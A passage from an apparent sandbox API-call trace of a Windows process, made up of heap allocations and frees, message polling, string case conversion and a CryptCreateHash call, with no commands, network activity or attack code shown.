(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.993] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.993] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.993] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.993] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0086.993] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.993] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0086.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.993] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.993] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.993] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.042] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.042] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.042] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.042] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.042] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.043] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.043] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.043] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.043] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.043] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.043] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.043] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.043] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.043] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.044] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.044] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.045] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0087.045] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0087.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0087.048] HeapFree (in: 